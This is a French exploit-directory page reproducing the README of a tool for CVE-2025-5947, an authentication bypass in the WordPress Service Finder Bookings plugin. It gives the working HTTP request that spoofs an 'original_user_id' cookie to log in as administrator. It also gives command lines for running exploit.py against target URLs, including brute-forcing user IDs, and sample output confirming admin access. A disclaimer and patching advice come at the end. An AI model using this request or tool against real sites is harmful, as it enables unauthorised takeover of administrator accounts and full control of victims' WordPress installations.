Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit | Kitploit
Outils/GitHubGitHub/xxconi/cve-2025-5947
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

Voir le dépôt
10il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

Outil d'exploitation pour la vulnérabilité de contournement d'authentification dans le plugin WordPress Service Finder Bookings ≤ 6.0

📋 Table des matières

  • À propos de la vulnérabilité
  • Détails techniques
  • Installation
  • Utilisation
  • Exemples
  • Résultats
  • Sécurité
  • Sources

🔴 À propos de la vulnérabilité

CVE-2025-5947

Une vulnérabilité critique de contournement d'authentification a été découverte dans le plugin WordPress Service Finder Bookings version 6.0 et antérieures.

CaractéristiqueValeur
CVE IDCVE-2025-5947
PluginService Finder Bookings (sf-booking)
Version affectée≤ 6.0
Gravité🔴 CRITIQUE
Score CVSS9.8
CWECWE-639 (Contournement d'autorisation)
Score EPSS0.617 (98.357 percentile)
Date de publication2025

🎯 Impact

Les attaquants non authentifiés peuvent :

  • ✅ Se connecter en tant que n'importe quel utilisateur
  • ✅ Accéder aux comptes administrateur
  • ✅ Obtenir un contrôle total du système
  • ✅ Provoquer une fuite de données
  • ✅ Télécharger du code malveillant

🔍 Détails techniques

Cause de la vulnérabilité

La fonction service_finder_switch_back() présente une validation insuffisante des cookies :

// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // Doğrulama yok!
}

Vecteur d'attaque

GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

Caractéristiques de l'attaque :

  • 🌐 Accès à distance (AV:N)
  • 🔓 Aucune authentification requise (PR:N)
  • 👤 Aucune interaction utilisateur (UI:N)
  • 📊 Impact total (C:H, I:H, A:H)

📦 Installation

Prérequis

  • Python 3.6+
  • Bibliothèque requests

Étape 1 : Cloner le dépôt

git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

Étape 2 : Installer les dépendances

pip install -r requirements.txt

Étape 3 : Exécuter

python exploit.py -u http://target.com

🚀 Utilisation

Commandes de base

# Afficher l'aide
python exploit.py -h

# Tenter de se connecter en tant qu'admin (ID=1)
python exploit.py -u http://target.com

# Avec un ID utilisateur spécifique
python exploit.py -u http://target.com -i 5

# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# Sans vérification SSL
python exploit.py -u http://target.com --no-ssl-verify

# Avec un timeout personnalisé
python exploit.py -u http://target.com -t 30

Paramètres

ParamètreAbréviationDescriptionPar défaut
--url-uURL cible (obligatoire)-
--user-id-iID utilisateur1
--brute-force-bPlage de brute force (1-10)-
--no-ssl-verify-Désactiver la vérification SSLFalse
--timeout-tTimeout de la requête (secondes)10

💡 Exemples

Exemple 1 : Exploitation simple

python exploit.py -u http://wordpress.local

Sortie :

============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu

🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/

Exemple 2 : Brute force

python exploit.py -u http://target.com -b 1-20

Sortie :

🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]

Exemple 3 : HTTPS sans vérification SSL

python exploit.py -u https://target.com --no-ssl-verify

📊 Résultats

Une exploitation réussie inclut les indicateurs suivants :

✅ Code de réponse HTTP 301 ou 302
✅ Présence de /wp-admin/ dans l'en-tête Location
✅ Présence de wordpress_logged_in_ dans l'en-tête Set-Cookie

🛡️ Sécurité

⚠️ Avertissement légal

Cet outil doit être utilisé uniquement :

  • ✅ Pour des tests de sécurité autorisés
  • ✅ Sur vos propres systèmes
  • ✅ Avec une autorisation écrite

L'auteur décline toute responsabilité.

🔐 Mesures de protection

  1. Mise à jour urgente

    # Mettre à jour depuis le panneau d'administration WordPress
    # ou via WP-CLI
    wp plugin update sf-booking
    
  2. Désactiver le plugin

    wp plugin deactivate sf-booking
    
  3. Supprimer le plugin

    wp plugin delete sf-booking
    
  4. Pare-feu applicatif (WAF)

    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. Vérification de sécurité

    • Vérifier les comptes administrateur
    • Examiner les journaux d'accès
    • Rechercher des connexions non autorisées

📚 Sources

  • Base de données Patchstack
  • Avis GitHub
  • Détails NVD
  • Exploit original
  • Calculateur CVSS

🤝 Contribution

Pour signaler des bugs ou suggérer des améliorations :

  1. Forkez le dépôt
  2. Créez une branche de fonctionnalité (git checkout -b feature/improvement)
  3. Commitez (git commit -am 'Add improvement')
  4. Pushez (git push origin feature/improvement)
  5. Ouvrez une Pull Request

📄 Licence

Licence MIT - Consultez le fichier LICENSE pour plus de détails

👤 Auteur

Chercheur en sécurité

  • GitHub : @yourusername

🙏 Remerciements

  • Équipe de sécurité Patchstack
  • Communauté WordPress Security
  • Coordinateurs CVE

⭐ Si vous trouvez cela utile, mettez une étoile !

🔝 Retour en haut

Télécharger l’outil